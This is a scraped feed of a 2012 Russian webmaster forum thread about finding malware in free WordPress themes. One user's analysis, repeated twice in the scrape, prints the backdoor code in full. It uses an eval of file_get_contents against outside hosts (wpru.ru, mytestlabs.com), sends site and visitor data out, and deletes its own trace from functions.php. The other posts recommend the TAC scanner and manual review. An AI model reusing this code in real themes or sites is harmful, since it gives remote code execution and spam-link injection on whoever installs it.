http://webmasters.ru/forum/showthread.php?t=37058 SEO форум вебмастеров - Поисковые системы, оптимизация, раскрутка сайта, оптимизация и продвижение сайта в поисковых системах 1741988002 Elesite CMS 60 http://webmasters.ru/forum/images/wm/misc/rss.png http://webmasters.ru/forum http://webmasters.ru/forum/showpost.php?p=372818 Fri, 07 Dec 2012 07:41:04 GMT Собственно к чему я это решил спросить, я тут не давно столкнулся с такой бедой что в месте с темой на сайт прописывается зловред который потом добавляет скрытые ссылки на страницы сайта, вещь излечимая но все же не приятная. Кто нибудь сталкивался с такой бедой? http://webmasters.ru/forum/showpost.php?p=372821 Fri, 07 Dec 2012 07:44:22 GMT насколько я помню с чем-то подобным сталкивался 13-й P.s. сам вп почти не использую, поэтому не смотрю http://webmasters.ru/forum/showpost.php?p=372823 Fri, 07 Dec 2012 07:45:01 GMT Шаблон с офф. сайта или какого то варезника? http://webmasters.ru/forum/showpost.php?p=372824 Fri, 07 Dec 2012 07:47:00 GMT Я, например, ВСЕ файлы шаблона проверяю перед установкой новой темы. Во-первых, для проверки темы на "злой" код, во-вторых, для исправления ошибок автора темы. А вообще, темы нужно проверять 100%. Очень много в инете зараженных тем. http://webmasters.ru/forum/showpost.php?p=372826 Fri, 07 Dec 2012 07:48:45 GMT itup, ну тема вроде позиционировалась как бесплатная. Как на в самом деле хз. http://webmasters.ru/forum/showpost.php?p=372832 Fri, 07 Dec 2012 07:58:06 GMT есть специальный плагин для проверки тем, как называется не помню (если найду, скину ссылку), проверяет на левые ссылки и остальное http://webmasters.ru/forum/showpost.php?p=372834 Fri, 07 Dec 2012 08:07:51 GMT В общем может кому пригодится, я тут немного по исследовал данный вопрос, во что получается. Чаще всего зловред обитает в файле functions.php, а именно: add_action('after_setup_theme', '_theme_setup'); function _theme_setup(){ $value = 'return eval(file_get_contents(\'http://wpru.ru/aksimet.php?id=\'.$post->ID.\'&m=46&n\'));'; add_option('blogoption', $value, '', 'yes'); //selfterminate $functions = file_get_contents(TEMPLATEPATH.'/functions.php'); $p1 = substr($functions, 0, strpos($functions, '//beginXX')); $p2 = end(explode('//endXX', $functions)); file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2); } add_filter('the_content', '_bloginfo', 10001); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){ return $co; } else return $content; } После активации темы он видимо меняет это код на код следующего характера, так как на зараженных сайтах код что выше отсутствовал, за то был такой: function wp_footer_() { return @eval(get_option('blogoption')); } Так же на зараженных сайтах если выполнить запрос к базе: SELECT * FROM `wp_options` WHERE `option_name` = 'blogoption' Результат был такой: global $post;return eval(file_get_contents('http://mytestlabs.com/wp5.php?ag='.strpos($_SERVER['HTTP_USER_AGENT'],'yahoo').'&p404='.is_404().'&p_id='.$post->ID.'&single='.(is_single()||is_page()).'&perm='.get_permalink().'&site='.$_SERVER['HTTP_HOST'].'&page='.$_SERVER['REQUEST_URI'].'&ip='.getenv('REMOTE_ADDR'))); Выводился эта беда в footer.php функцией wp_footer_(); как видно очень похожей на родную. Весь этот зловред плодил на сайте скрытые ссылки, при просмотре их не было видно они скрывались с помощью css. После удаления этого кода ссылки пропали. ---------- Сообщение добавлено 12:03 ---------- Предыдущее 12:01 ---------- vorons, а он проверяет до активации темы или уже непосредственно активированную тему на сайте? ---------- Сообщение добавлено 12:07 ---------- Предыдущее 12:03 ---------- lexxx, теперь я тоже :) ID.\'&m=46&n\'));'; add_option('blogoption', $value, '', 'yes'); //selfterminate $functions = file_get_contents(TEMPLATEPATH.'/functions.php'); $p1 = substr($functions, 0, strpos($functions, '//beginXX')); $p2 = end(explode('//endXX', $functions)); file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2); } add_filter('the_content', '_bloginfo', 10001); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){ return $co; } else return $content; } После активации темы он видимо меняет это код на код следующего характера, так как на зараженных сайтах код что выше отсутствовал, за то был такой: function wp_footer_() { return @eval(get_option('blogoption')); } Так же на зараженных сайтах если выполнить запрос к базе: SELECT * FROM `wp_options` WHERE `option_name` = 'blogoption' Результат был такой: global $post;return eval(file_get_contents('http://mytestlabs.com/wp5.php?ag='.strpos($_SERVER['HTTP_USER_AGENT'],'yahoo').'&p404='.is_404().'&p_id='.$post->ID.'&single='.(is_single()||is_page()).'&perm='.get_permalink().'&site='.$_SERVER['HTTP_HOST'].'&page='.$_SERVER['REQUEST_URI'].'&ip='.getenv('REMOTE_ADDR'))); Выводился эта беда в footer.php функцией wp_footer_(); как видно очень похожей на родную. Весь этот зловред плодил на сайте скрытые ссылки, при просмотре их не было видно они скрывались с помощью css. После удаления этого кода ссылки пропали. ---------- Сообщение добавлено 12:03 ---------- Предыдущее 12:01 ---------- vorons, а он проверяет до активации темы или уже непосредственно активированную тему на сайте? ---------- Сообщение добавлено 12:07 ---------- Предыдущее 12:03 ---------- lexxx, теперь я тоже :)]]> http://webmasters.ru/forum/showpost.php?p=372843 Fri, 07 Dec 2012 08:12:21 GMT voffka_m, а он проверяет до активации темы или уже непосредственно активированную тему на сайте? насчетт этого честно незнаю, я его сам не проверял т.к. с wp не работаю http://webmasters.ru/forum/showpost.php?p=372853 Fri, 07 Dec 2012 08:34:29 GMT я пользуюсь плагином TAC. Ссылка на wordpress.org (http://wordpress.org/extend/plugins/tac/) Плагин TAC ищет в коде шаблона зашифрованные внешние ссылки, которые оставляют создатели шаблонов для продвижения своих сайтов. Установка плагина TAC. В админке блога находим раздел Плагины — нажимаем Добавить новый — и в открывшемся окне вводим в строку поиска его название: TAC. Устанавливаем плагин TAC и активируем его. Для открытия страницы плагины найдите в разделе Внешний вид — нажмите TAC. Откроется страница на которой будут представлены результаты поиска закодированных ссылок в шаблоне по всем установленным темам на сайте http://webmasters.ru/forum/showpost.php?p=372855 Fri, 07 Dec 2012 08:36:53 GMT Я не проверял раньше. Но недавно, заметил в одном шаблоне wp скрытые ссылки, теперь смотрю. Будьте внимательны! :) Werdik, спасибо за плагин! http://webmasters.ru/forum/showpost.php?p=372860 Fri, 07 Dec 2012 08:43:44 GMT Werdik, жалко что он тока показывает ссылки закодированные в base64, файлик functions.php все равно придется ручками проверять. http://webmasters.ru/forum/showpost.php?p=372914 Fri, 07 Dec 2012 10:36:04 GMT voffka_m,проверьте еще раз. Как раз таки на base64 плагин чаще всего и кивает.. http://webmasters.ru/forum/showpost.php?p=372919 Fri, 07 Dec 2012 10:43:15 GMT Смотрю конечно. Особенно тщательно, если тему качаю с какого-нибудь левого сайта. Выше уже посоветовали TAC - прекрасный плагин для обнаружения всякой гадости. http://webmasters.ru/forum/showpost.php?p=372962 Fri, 07 Dec 2012 11:48:53 GMT Я когда-то скачал тему, в header.php которой было прописано noindex и nofollow всего контента. Так что, проверять темы - дело нужное. http://webmasters.ru/forum/showpost.php?p=373748 Sun, 09 Dec 2012 07:01:00 GMT Обязательно проверяю, правда сначала ставлю, а потом смотрю левые ссылки в коде. http://webmasters.ru/forum/showpost.php?p=381715 Mon, 24 Dec 2012 17:20:35 GMT Файлы обязательны для проверки. особо часто вставляют подобные ссылки как кодированные так и не кодированные в footer functions. При этом выше voffka_m описывал довольно сложный вариант. Чаще вставляют скрипт PHP который рендомом выводит ссылки на главную, одиночную и рубрики. Убираешь и все нормально с шаблоном. Хитрецы вставляют код, но если убрать значение href, то шаблон отрубается. если заменить адрес чужой на свой, шаблон работает но вес передает не на чужой сайт а на свой. некоторые а ля VIP шаблоны содержат код Баннеров и ссылок, которые рекламируют создателя или ресурс, с которого скачали шаблон. Все можно убрать или заменить или в 90% случаев: functions, sidebar , footer . Плагин TAC помогает очень хорошо, но иногда с functions случаются проколы http://webmasters.ru/forum/showpost.php?p=381732 Mon, 24 Dec 2012 17:53:23 GMT Всегда проверяю каждый файл шаблона. При чем не беглым взглядом, а "читаю код". Кроме того, смотрю код различных модулей/плагинов (и не только для WP). Время, знаете ли, такое сейчас... http://webmasters.ru/forum/showpost.php?p=381736 Mon, 24 Dec 2012 18:05:00 GMT Уже писали, что нужно установить плагин TAC, который показывает внешние ссылки. Кроме того, проверяю код шаблона глазками в редакторе Notepad++. Все равно шаблон приходится редактировать под себя. :cool: http://webmasters.ru/forum/showpost.php?p=381859 Mon, 24 Dec 2012 21:34:19 GMT Сразу проверяю хедер, футер, функции, потом проверяю все ТАСом и очищаю остатки. http://webmasters.ru/forum/showpost.php?p=463495 Sun, 12 May 2013 12:42:08 GMT смотрят далеко не все, а надо бы... http://webmasters.ru/forum/showpost.php?p=463507 Sun, 12 May 2013 13:02:01 GMT TAC очищает далеко не все. Вручную тоже можно всего не найти да и приходится изучать подробно весь шаб. Тоже в свое время обжигался на этой теме. Что только не встречал в шабах :(. В итоге пришел к выводу, что лучше купить несколько паков шаблонов уже известных студий, чем возиться с бекапами серверов :(